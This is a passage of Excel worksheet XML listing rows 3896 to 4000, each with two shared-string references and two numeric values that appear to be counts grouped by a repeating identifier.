      </c>
    </row>
    <row r="3896" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A3896" t="s">
        <v>16228</v>
      </c>
      <c r="B3896" t="s">
        <v>16213</v>
      </c>
      <c r="C3896">
        <v>0</v>
      </c>
      <c r="D3896">
        <v>2671</v>
      </c>
    </row>
    <row r="3897" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A3897" t="s">
        <v>16231</v>
      </c>
      <c r="B3897" t="s">
        <v>16214</v>
      </c>
      <c r="C3897">
        <v>0</v>
      </c>
      <c r="D3897">
        <v>2671</v>
      </c>
    </row>
    <row r="3898" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A3898" t="s">
        <v>16228</v>
      </c>
      <c r="B3898" t="s">
        <v>16215</v>
      </c>
      <c r="C3898">
        <v>0</v>
      </c>
      <c r="D3898">
        <v>2671</v>
      </c>
    </row>
    <row r="3899" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A3899" t="s">
        <v>16231</v>
      </c>
      <c r="B3899" t="s">
        <v>16216</v>
      </c>
      <c r="C3899">
        <v>2</v>
      </c>
      <c r="D3899">
        <v>2671</v>
      </c>
    </row>
    <row r="3900" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A3900" t="s">
        <v>16228</v>
      </c>
      <c r="B3900" t="s">
        <v>16217</v>
      </c>
      <c r="C3900">
        <v>2</v>
      </c>
      <c r="D3900">
        <v>2671</v>
      </c>
    </row>
    <row r="3901" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A3901" t="s">
        <v>16231</v>
      </c>
      <c r="B3901" t="s">
        <v>16218</v>
      </c>
      <c r="C3901">
        <v>0</v>
      </c>
      <c r="D3901">
        <v>2671</v>
      </c>
    </row>
    <row r="3902" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A3902" t="s">
        <v>16229</v>
      </c>
      <c r="B3902" t="s">
        <v>16219</v>
      </c>
      <c r="C3902">
        <v>0</v>
      </c>
      <c r="D3902">
        <v>2671</v>
      </c>
    </row>
    <row r="3903" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A3903" t="s">
        <v>16230</v>
      </c>
      <c r="B3903" t="s">
        <v>16220</v>
      </c>
      <c r="C3903">
        <v>0</v>
      </c>
      <c r="D3903">
        <v>2671</v>
      </c>
    </row>
    <row r="3904" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A3904" t="s">
        <v>16229</v>
      </c>
      <c r="B3904" t="s">
        <v>16221</v>
      </c>
      <c r="C3904">
        <v>2</v>
      </c>
      <c r="D3904">
        <v>2671</v>
      </c>
    </row>
    <row r="3905" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A3905" t="s">
        <v>16230</v>
      </c>
      <c r="B3905" t="s">
        <v>16222</v>
      </c>
      <c r="C3905">
        <v>0</v>
      </c>
      <c r="D3905">
        <v>2671</v>
      </c>
    </row>
    <row r="3906" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A3906" t="s">
        <v>16223</v>
      </c>
      <c r="B3906" t="s">
        <v>16223</v>
      </c>
      <c r="C3906">
        <v>26</v>
      </c>
      <c r="D3906">
        <v>2671</v>
      </c>
    </row>
    <row r="3907" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A3907" t="s">
        <v>16224</v>
      </c>
      <c r="B3907" t="s">
        <v>16224</v>
      </c>
      <c r="C3907">
        <v>2</v>
      </c>
      <c r="D3907">
        <v>2671</v>
      </c>
    </row>
    <row r="3908" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A3908" t="s">
        <v>16228</v>
      </c>
      <c r="B3908" t="s">
        <v>16211</v>
      </c>
      <c r="C3908">
        <v>0</v>
      </c>
      <c r="D3908">
        <v>170</v>
      </c>
    </row>
    <row r="3909" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A3909" t="s">
        <v>16231</v>
      </c>
      <c r="B3909" t="s">
        <v>16212</v>
      </c>
      <c r="C3909">
        <v>0</v>
      </c>
      <c r="D3909">
        <v>170</v>
      </c>
    </row>
    <row r="3910" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A3910" t="s">
        <v>16228</v>
      </c>
      <c r="B3910" t="s">
        <v>16213</v>
      </c>
      <c r="C3910">
        <v>0</v>
      </c>
      <c r="D3910">
        <v>170</v>
      </c>
    </row>
    <row r="3911" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A3911" t="s">
        <v>16231</v>
      </c>
      <c r="B3911" t="s">
        <v>16214</v>
      </c>
      <c r="C3911">
        <v>0</v>
      </c>
      <c r="D3911">
        <v>170</v>
      </c>
    </row>
    <row r="3912" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A3912" t="s">
        <v>16228</v>
      </c>
      <c r="B3912" t="s">
        <v>16215</v>
      </c>
      <c r="C3912">
        <v>0</v>
      </c>
      <c r="D3912">
        <v>170</v>
      </c>
    </row>
    <row r="3913" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A3913" t="s">
        <v>16231</v>
      </c>
      <c r="B3913" t="s">
        <v>16216</v>
      </c>
      <c r="C3913">
        <v>5</v>
      </c>
      <c r="D3913">
        <v>170</v>
      </c>
    </row>
    <row r="3914" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A3914" t="s">
        <v>16228</v>
      </c>
      <c r="B3914" t="s">
        <v>16217</v>
      </c>
      <c r="C3914">
        <v>15</v>
      </c>
      <c r="D3914">
        <v>170</v>
      </c>
    </row>
    <row r="3915" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A3915" t="s">
        <v>16231</v>
      </c>
      <c r="B3915" t="s">
        <v>16218</v>
      </c>
      <c r="C3915">
        <v>5</v>
      </c>
      <c r="D3915">
        <v>170</v>
      </c>
    </row>
    <row r="3916" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A3916" t="s">
        <v>16229</v>
      </c>
      <c r="B3916" t="s">
        <v>16219</v>
      </c>
      <c r="C3916">
        <v>0</v>
      </c>
      <c r="D3916">
        <v>170</v>
      </c>
    </row>
    <row r="3917" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A3917" t="s">
        <v>16230</v>
      </c>
      <c r="B3917" t="s">
        <v>16220</v>
      </c>
      <c r="C3917">
        <v>0</v>
      </c>
      <c r="D3917">
        <v>170</v>
      </c>
    </row>
    <row r="3918" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A3918" t="s">
        <v>16229</v>
      </c>
      <c r="B3918" t="s">
        <v>16221</v>
      </c>
      <c r="C3918">
        <v>10</v>
      </c>
      <c r="D3918">
        <v>170</v>
      </c>
    </row>
    <row r="3919" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A3919" t="s">
        <v>16230</v>
      </c>
      <c r="B3919" t="s">
        <v>16222</v>
      </c>
      <c r="C3919">
        <v>10</v>
      </c>
      <c r="D3919">
        <v>170</v>
      </c>
    </row>
    <row r="3920" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A3920" t="s">
        <v>16223</v>
      </c>
      <c r="B3920" t="s">
        <v>16223</v>
      </c>
      <c r="C3920">
        <v>26</v>
      </c>
      <c r="D3920">
        <v>170</v>
      </c>
    </row>
    <row r="3921" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A3921" t="s">
        <v>16224</v>
      </c>
      <c r="B3921" t="s">
        <v>16224</v>
      </c>
      <c r="C3921">
        <v>0</v>
      </c>
      <c r="D3921">
        <v>170</v>
      </c>
    </row>
    <row r="3922" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A3922" t="s">
        <v>16228</v>
      </c>
      <c r="B3922" t="s">
        <v>16211</v>
      </c>
      <c r="C3922">
        <v>0</v>
      </c>
      <c r="D3922">
        <v>2610</v>
      </c>
    </row>
    <row r="3923" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A3923" t="s">
        <v>16231</v>
      </c>
      <c r="B3923" t="s">
        <v>16212</v>
      </c>
      <c r="C3923">
        <v>0</v>
      </c>
      <c r="D3923">
        <v>2610</v>
      </c>
    </row>
    <row r="3924" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A3924" t="s">
        <v>16228</v>
      </c>
      <c r="B3924" t="s">
        <v>16213</v>
      </c>
      <c r="C3924">
        <v>0</v>
      </c>
      <c r="D3924">
        <v>2610</v>
      </c>
    </row>
    <row r="3925" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A3925" t="s">
        <v>16231</v>
      </c>
      <c r="B3925" t="s">
        <v>16214</v>
      </c>
      <c r="C3925">
        <v>0</v>
      </c>
      <c r="D3925">
        <v>2610</v>
      </c>
    </row>
    <row r="3926" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A3926" t="s">
        <v>16228</v>
      </c>
      <c r="B3926" t="s">
        <v>16215</v>
      </c>
      <c r="C3926">
        <v>2</v>
      </c>
      <c r="D3926">
        <v>2610</v>
      </c>
    </row>
    <row r="3927" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A3927" t="s">
        <v>16231</v>
      </c>
      <c r="B3927" t="s">
        <v>16216</v>
      </c>
      <c r="C3927">
        <v>0</v>
      </c>
      <c r="D3927">
        <v>2610</v>
      </c>
    </row>
    <row r="3928" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A3928" t="s">
        <v>16228</v>
      </c>
      <c r="B3928" t="s">
        <v>16217</v>
      </c>
      <c r="C3928">
        <v>1</v>
      </c>
      <c r="D3928">
        <v>2610</v>
      </c>
    </row>
    <row r="3929" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A3929" t="s">
        <v>16231</v>
      </c>
      <c r="B3929" t="s">
        <v>16218</v>
      </c>
      <c r="C3929">
        <v>0</v>
      </c>
      <c r="D3929">
        <v>2610</v>
      </c>
    </row>
    <row r="3930" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A3930" t="s">
        <v>16229</v>
      </c>
      <c r="B3930" t="s">
        <v>16219</v>
      </c>
      <c r="C3930">
        <v>0</v>
      </c>
      <c r="D3930">
        <v>2610</v>
      </c>
    </row>
    <row r="3931" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A3931" t="s">
        <v>16230</v>
      </c>
      <c r="B3931" t="s">
        <v>16220</v>
      </c>
      <c r="C3931">
        <v>0</v>
      </c>
      <c r="D3931">
        <v>2610</v>
      </c>
    </row>
    <row r="3932" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A3932" t="s">
        <v>16229</v>
      </c>
      <c r="B3932" t="s">
        <v>16221</v>
      </c>
      <c r="C3932">
        <v>0</v>
      </c>
      <c r="D3932">
        <v>2610</v>
      </c>
    </row>
    <row r="3933" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A3933" t="s">
        <v>16230</v>
      </c>
      <c r="B3933" t="s">
        <v>16222</v>
      </c>
      <c r="C3933">
        <v>0</v>
      </c>
      <c r="D3933">
        <v>2610</v>
      </c>
    </row>
    <row r="3934" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A3934" t="s">
        <v>16223</v>
      </c>
      <c r="B3934" t="s">
        <v>16223</v>
      </c>
      <c r="C3934">
        <v>26</v>
      </c>
      <c r="D3934">
        <v>2610</v>
      </c>
    </row>
    <row r="3935" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A3935" t="s">
        <v>16224</v>
      </c>
      <c r="B3935" t="s">
        <v>16224</v>
      </c>
      <c r="C3935">
        <v>0</v>
      </c>
      <c r="D3935">
        <v>2610</v>
      </c>
    </row>
    <row r="3936" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A3936" t="s">
        <v>16228</v>
      </c>
      <c r="B3936" t="s">
        <v>16211</v>
      </c>
      <c r="C3936">
        <v>0</v>
      </c>
      <c r="D3936">
        <v>1430</v>
      </c>
    </row>
    <row r="3937" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A3937" t="s">
        <v>16231</v>
      </c>
      <c r="B3937" t="s">
        <v>16212</v>
      </c>
      <c r="C3937">
        <v>0</v>
      </c>
      <c r="D3937">
        <v>1430</v>
      </c>
    </row>
    <row r="3938" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A3938" t="s">
        <v>16228</v>
      </c>
      <c r="B3938" t="s">
        <v>16213</v>
      </c>
      <c r="C3938">
        <v>0</v>
      </c>
      <c r="D3938">
        <v>1430</v>
      </c>
    </row>
    <row r="3939" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A3939" t="s">
        <v>16231</v>
      </c>
      <c r="B3939" t="s">
        <v>16214</v>
      </c>
      <c r="C3939">
        <v>0</v>
      </c>
      <c r="D3939">
        <v>1430</v>
      </c>
    </row>
    <row r="3940" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A3940" t="s">
        <v>16228</v>
      </c>
      <c r="B3940" t="s">
        <v>16215</v>
      </c>
      <c r="C3940">
        <v>1</v>
      </c>
      <c r="D3940">
        <v>1430</v>
      </c>
    </row>
    <row r="3941" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A3941" t="s">
        <v>16231</v>
      </c>
      <c r="B3941" t="s">
        <v>16216</v>
      </c>
      <c r="C3941">
        <v>1</v>
      </c>
      <c r="D3941">
        <v>1430</v>
      </c>
    </row>
    <row r="3942" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A3942" t="s">
        <v>16228</v>
      </c>
      <c r="B3942" t="s">
        <v>16217</v>
      </c>
      <c r="C3942">
        <v>234</v>
      </c>
      <c r="D3942">
        <v>1430</v>
      </c>
    </row>
    <row r="3943" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A3943" t="s">
        <v>16231</v>
      </c>
      <c r="B3943" t="s">
        <v>16218</v>
      </c>
      <c r="C3943">
        <v>0</v>
      </c>
      <c r="D3943">
        <v>1430</v>
      </c>
    </row>
    <row r="3944" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A3944" t="s">
        <v>16229</v>
      </c>
      <c r="B3944" t="s">
        <v>16219</v>
      </c>
      <c r="C3944">
        <v>0</v>
      </c>
      <c r="D3944">
        <v>1430</v>
      </c>
    </row>
    <row r="3945" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A3945" t="s">
        <v>16230</v>
      </c>
      <c r="B3945" t="s">
        <v>16220</v>
      </c>
      <c r="C3945">
        <v>0</v>
      </c>
      <c r="D3945">
        <v>1430</v>
      </c>
    </row>
    <row r="3946" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A3946" t="s">
        <v>16229</v>
      </c>
      <c r="B3946" t="s">
        <v>16221</v>
      </c>
      <c r="C3946">
        <v>140</v>
      </c>
      <c r="D3946">
        <v>1430</v>
      </c>
    </row>
    <row r="3947" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A3947" t="s">
        <v>16230</v>
      </c>
      <c r="B3947" t="s">
        <v>16222</v>
      </c>
      <c r="C3947">
        <v>0</v>
      </c>
      <c r="D3947">
        <v>1430</v>
      </c>
    </row>
    <row r="3948" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A3948" t="s">
        <v>16223</v>
      </c>
      <c r="B3948" t="s">
        <v>16223</v>
      </c>
      <c r="C3948">
        <v>24</v>
      </c>
      <c r="D3948">
        <v>1430</v>
      </c>
    </row>
    <row r="3949" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A3949" t="s">
        <v>16224</v>
      </c>
      <c r="B3949" t="s">
        <v>16224</v>
      </c>
      <c r="C3949">
        <v>24</v>
      </c>
      <c r="D3949">
        <v>1430</v>
      </c>
    </row>
    <row r="3950" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A3950" t="s">
        <v>16228</v>
      </c>
      <c r="B3950" t="s">
        <v>16211</v>
      </c>
      <c r="C3950">
        <v>0</v>
      </c>
      <c r="D3950">
        <v>280</v>
      </c>
    </row>
    <row r="3951" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A3951" t="s">
        <v>16231</v>
      </c>
      <c r="B3951" t="s">
        <v>16212</v>
      </c>
      <c r="C3951">
        <v>0</v>
      </c>
      <c r="D3951">
        <v>280</v>
      </c>
    </row>
    <row r="3952" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A3952" t="s">
        <v>16228</v>
      </c>
      <c r="B3952" t="s">
        <v>16213</v>
      </c>
      <c r="C3952">
        <v>0</v>
      </c>
      <c r="D3952">
        <v>280</v>
      </c>
    </row>
    <row r="3953" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A3953" t="s">
        <v>16231</v>
      </c>
      <c r="B3953" t="s">
        <v>16214</v>
      </c>
      <c r="C3953">
        <v>0</v>
      </c>
      <c r="D3953">
        <v>280</v>
      </c>
    </row>
    <row r="3954" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A3954" t="s">
        <v>16228</v>
      </c>
      <c r="B3954" t="s">
        <v>16215</v>
      </c>
      <c r="C3954">
        <v>55</v>
      </c>
      <c r="D3954">
        <v>280</v>
      </c>
    </row>
    <row r="3955" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A3955" t="s">
        <v>16231</v>
      </c>
      <c r="B3955" t="s">
        <v>16216</v>
      </c>
      <c r="C3955">
        <v>7</v>
      </c>
      <c r="D3955">
        <v>280</v>
      </c>
    </row>
    <row r="3956" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A3956" t="s">
        <v>16228</v>
      </c>
      <c r="B3956" t="s">
        <v>16217</v>
      </c>
      <c r="C3956">
        <v>10</v>
      </c>
      <c r="D3956">
        <v>280</v>
      </c>
    </row>
    <row r="3957" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A3957" t="s">
        <v>16231</v>
      </c>
      <c r="B3957" t="s">
        <v>16218</v>
      </c>
      <c r="C3957">
        <v>6</v>
      </c>
      <c r="D3957">
        <v>280</v>
      </c>
    </row>
    <row r="3958" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A3958" t="s">
        <v>16229</v>
      </c>
      <c r="B3958" t="s">
        <v>16219</v>
      </c>
      <c r="C3958">
        <v>18</v>
      </c>
      <c r="D3958">
        <v>280</v>
      </c>
    </row>
    <row r="3959" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A3959" t="s">
        <v>16230</v>
      </c>
      <c r="B3959" t="s">
        <v>16220</v>
      </c>
      <c r="C3959">
        <v>12</v>
      </c>
      <c r="D3959">
        <v>280</v>
      </c>
    </row>
    <row r="3960" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A3960" t="s">
        <v>16229</v>
      </c>
      <c r="B3960" t="s">
        <v>16221</v>
      </c>
      <c r="C3960">
        <v>39</v>
      </c>
      <c r="D3960">
        <v>280</v>
      </c>
    </row>
    <row r="3961" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A3961" t="s">
        <v>16230</v>
      </c>
      <c r="B3961" t="s">
        <v>16222</v>
      </c>
      <c r="C3961">
        <v>79</v>
      </c>
      <c r="D3961">
        <v>280</v>
      </c>
    </row>
    <row r="3962" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A3962" t="s">
        <v>16223</v>
      </c>
      <c r="B3962" t="s">
        <v>16223</v>
      </c>
      <c r="C3962">
        <v>25</v>
      </c>
      <c r="D3962">
        <v>280</v>
      </c>
    </row>
    <row r="3963" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A3963" t="s">
        <v>16224</v>
      </c>
      <c r="B3963" t="s">
        <v>16224</v>
      </c>
      <c r="C3963">
        <v>1</v>
      </c>
      <c r="D3963">
        <v>280</v>
      </c>
    </row>
    <row r="3964" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A3964" t="s">
        <v>16228</v>
      </c>
      <c r="B3964" t="s">
        <v>16211</v>
      </c>
      <c r="C3964">
        <v>0</v>
      </c>
      <c r="D3964">
        <v>1713</v>
      </c>
    </row>
    <row r="3965" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A3965" t="s">
        <v>16231</v>
      </c>
      <c r="B3965" t="s">
        <v>16212</v>
      </c>
      <c r="C3965">
        <v>0</v>
      </c>
      <c r="D3965">
        <v>1713</v>
      </c>
    </row>
    <row r="3966" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A3966" t="s">
        <v>16228</v>
      </c>
      <c r="B3966" t="s">
        <v>16213</v>
      </c>
      <c r="C3966">
        <v>0</v>
      </c>
      <c r="D3966">
        <v>1713</v>
      </c>
    </row>
    <row r="3967" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A3967" t="s">
        <v>16231</v>
      </c>
      <c r="B3967" t="s">
        <v>16214</v>
      </c>
      <c r="C3967">
        <v>0</v>
      </c>
      <c r="D3967">
        <v>1713</v>
      </c>
    </row>
    <row r="3968" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A3968" t="s">
        <v>16228</v>
      </c>
      <c r="B3968" t="s">
        <v>16215</v>
      </c>
      <c r="C3968">
        <v>2</v>
      </c>
      <c r="D3968">
        <v>1713</v>
      </c>
    </row>
    <row r="3969" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A3969" t="s">
        <v>16231</v>
      </c>
      <c r="B3969" t="s">
        <v>16216</v>
      </c>
      <c r="C3969">
        <v>3</v>
      </c>
      <c r="D3969">
        <v>1713</v>
      </c>
    </row>
    <row r="3970" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A3970" t="s">
        <v>16228</v>
      </c>
      <c r="B3970" t="s">
        <v>16217</v>
      </c>
      <c r="C3970">
        <v>1</v>
      </c>
      <c r="D3970">
        <v>1713</v>
      </c>
    </row>
    <row r="3971" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A3971" t="s">
        <v>16231</v>
      </c>
      <c r="B3971" t="s">
        <v>16218</v>
      </c>
      <c r="C3971">
        <v>1</v>
      </c>
      <c r="D3971">
        <v>1713</v>
      </c>
    </row>
    <row r="3972" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A3972" t="s">
        <v>16229</v>
      </c>
      <c r="B3972" t="s">
        <v>16219</v>
      </c>
      <c r="C3972">
        <v>0</v>
      </c>
      <c r="D3972">
        <v>1713</v>
      </c>
    </row>
    <row r="3973" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A3973" t="s">
        <v>16230</v>
      </c>
      <c r="B3973" t="s">
        <v>16220</v>
      </c>
      <c r="C3973">
        <v>0</v>
      </c>
      <c r="D3973">
        <v>1713</v>
      </c>
    </row>
    <row r="3974" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A3974" t="s">
        <v>16229</v>
      </c>
      <c r="B3974" t="s">
        <v>16221</v>
      </c>
      <c r="C3974">
        <v>5</v>
      </c>
      <c r="D3974">
        <v>1713</v>
      </c>
    </row>
    <row r="3975" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A3975" t="s">
        <v>16230</v>
      </c>
      <c r="B3975" t="s">
        <v>16222</v>
      </c>
      <c r="C3975">
        <v>0</v>
      </c>
      <c r="D3975">
        <v>1713</v>
      </c>
    </row>
    <row r="3976" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A3976" t="s">
        <v>16223</v>
      </c>
      <c r="B3976" t="s">
        <v>16223</v>
      </c>
      <c r="C3976">
        <v>6</v>
      </c>
      <c r="D3976">
        <v>1713</v>
      </c>
    </row>
    <row r="3977" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A3977" t="s">
        <v>16224</v>
      </c>
      <c r="B3977" t="s">
        <v>16224</v>
      </c>
      <c r="C3977">
        <v>0</v>
      </c>
      <c r="D3977">
        <v>1713</v>
      </c>
    </row>
    <row r="3978" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A3978" t="s">
        <v>16228</v>
      </c>
      <c r="B3978" t="s">
        <v>16211</v>
      </c>
      <c r="C3978">
        <v>0</v>
      </c>
      <c r="D3978">
        <v>2653</v>
      </c>
    </row>
    <row r="3979" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A3979" t="s">
        <v>16231</v>
      </c>
      <c r="B3979" t="s">
        <v>16212</v>
      </c>
      <c r="C3979">
        <v>0</v>
      </c>
      <c r="D3979">
        <v>2653</v>
      </c>
    </row>
    <row r="3980" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A3980" t="s">
        <v>16228</v>
      </c>
      <c r="B3980" t="s">
        <v>16213</v>
      </c>
      <c r="C3980">
        <v>0</v>
      </c>
      <c r="D3980">
        <v>2653</v>
      </c>
    </row>
    <row r="3981" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A3981" t="s">
        <v>16231</v>
      </c>
      <c r="B3981" t="s">
        <v>16214</v>
      </c>
      <c r="C3981">
        <v>0</v>
      </c>
      <c r="D3981">
        <v>2653</v>
      </c>
    </row>
    <row r="3982" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A3982" t="s">
        <v>16228</v>
      </c>
      <c r="B3982" t="s">
        <v>16215</v>
      </c>
      <c r="C3982">
        <v>1</v>
      </c>
      <c r="D3982">
        <v>2653</v>
      </c>
    </row>
    <row r="3983" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A3983" t="s">
        <v>16231</v>
      </c>
      <c r="B3983" t="s">
        <v>16216</v>
      </c>
      <c r="C3983">
        <v>0</v>
      </c>
      <c r="D3983">
        <v>2653</v>
      </c>
    </row>
    <row r="3984" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A3984" t="s">
        <v>16228</v>
      </c>
      <c r="B3984" t="s">
        <v>16217</v>
      </c>
      <c r="C3984">
        <v>1</v>
      </c>
      <c r="D3984">
        <v>2653</v>
      </c>
    </row>
    <row r="3985" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A3985" t="s">
        <v>16231</v>
      </c>
      <c r="B3985" t="s">
        <v>16218</v>
      </c>
      <c r="C3985">
        <v>0</v>
      </c>
      <c r="D3985">
        <v>2653</v>
      </c>
    </row>
    <row r="3986" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A3986" t="s">
        <v>16229</v>
      </c>
      <c r="B3986" t="s">
        <v>16219</v>
      </c>
      <c r="C3986">
        <v>0</v>
      </c>
      <c r="D3986">
        <v>2653</v>
      </c>
    </row>
    <row r="3987" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A3987" t="s">
        <v>16230</v>
      </c>
      <c r="B3987" t="s">
        <v>16220</v>
      </c>
      <c r="C3987">
        <v>0</v>
      </c>
      <c r="D3987">
        <v>2653</v>
      </c>
    </row>
    <row r="3988" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A3988" t="s">
        <v>16229</v>
      </c>
      <c r="B3988" t="s">
        <v>16221</v>
      </c>
      <c r="C3988">
        <v>0</v>
      </c>
      <c r="D3988">
        <v>2653</v>
      </c>
    </row>
    <row r="3989" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A3989" t="s">
        <v>16230</v>
      </c>
      <c r="B3989" t="s">
        <v>16222</v>
      </c>
      <c r="C3989">
        <v>4</v>
      </c>
      <c r="D3989">
        <v>2653</v>
      </c>
    </row>
    <row r="3990" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A3990" t="s">
        <v>16223</v>
      </c>
      <c r="B3990" t="s">
        <v>16223</v>
      </c>
      <c r="C3990">
        <v>0</v>
      </c>
      <c r="D3990">
        <v>2653</v>
      </c>
    </row>
    <row r="3991" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A3991" t="s">
        <v>16224</v>
      </c>
      <c r="B3991" t="s">
        <v>16224</v>
      </c>
      <c r="C3991">
        <v>0</v>
      </c>
      <c r="D3991">
        <v>2653</v>
      </c>
    </row>
    <row r="3992" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A3992" t="s">
        <v>16228</v>
      </c>
      <c r="B3992" t="s">
        <v>16211</v>
      </c>
      <c r="C3992">
        <v>0</v>
      </c>
      <c r="D3992">
        <v>2098</v>
      </c>
    </row>
    <row r="3993" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A3993" t="s">
        <v>16231</v>
      </c>
      <c r="B3993" t="s">
        <v>16212</v>
      </c>
      <c r="C3993">
        <v>0</v>
      </c>
      <c r="D3993">
        <v>2098</v>
      </c>
    </row>
    <row r="3994" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A3994" t="s">
        <v>16228</v>
      </c>
      <c r="B3994" t="s">
        <v>16213</v>
      </c>
      <c r="C3994">
        <v>0</v>
      </c>
      <c r="D3994">
        <v>2098</v>
      </c>
    </row>
    <row r="3995" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A3995" t="s">
        <v>16231</v>
      </c>
      <c r="B3995" t="s">
        <v>16214</v>
      </c>
      <c r="C3995">
        <v>0</v>
      </c>
      <c r="D3995">
        <v>2098</v>
      </c>
    </row>
    <row r="3996" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A3996" t="s">
        <v>16228</v>
      </c>
      <c r="B3996" t="s">
        <v>16215</v>
      </c>
      <c r="C3996">
        <v>0</v>
      </c>
      <c r="D3996">
        <v>2098</v>
      </c>
    </row>
    <row r="3997" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A3997" t="s">
        <v>16231</v>
      </c>
      <c r="B3997" t="s">
        <v>16216</v>
      </c>
      <c r="C3997">
        <v>0</v>
      </c>
      <c r="D3997">
        <v>2098</v>
      </c>
    </row>
    <row r="3998" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A3998" t="s">
        <v>16228</v>
      </c>
      <c r="B3998" t="s">
        <v>16217</v>
      </c>
      <c r="C3998">
        <v>4</v>
      </c>
      <c r="D3998">
        <v>2098</v>
      </c>
    </row>
    <row r="3999" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A3999" t="s">
        <v>16231</v>
      </c>
      <c r="B3999" t="s">
        <v>16218</v>
      </c>
      <c r="C3999">
        <v>4</v>
      </c>
      <c r="D3999">
        <v>2098</v>
      </c>
    </row>
    <row r="4000" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A4000" t="s">
        <v>16229</v>
      </c>
      <c r="B4000" t="s">
        <v>16219</v>
      </c>
      <c r="C4000">
        <v>0</v>
      </c>
      <c r="D4000">
        <v>2098</v>
      </c>
    </row>
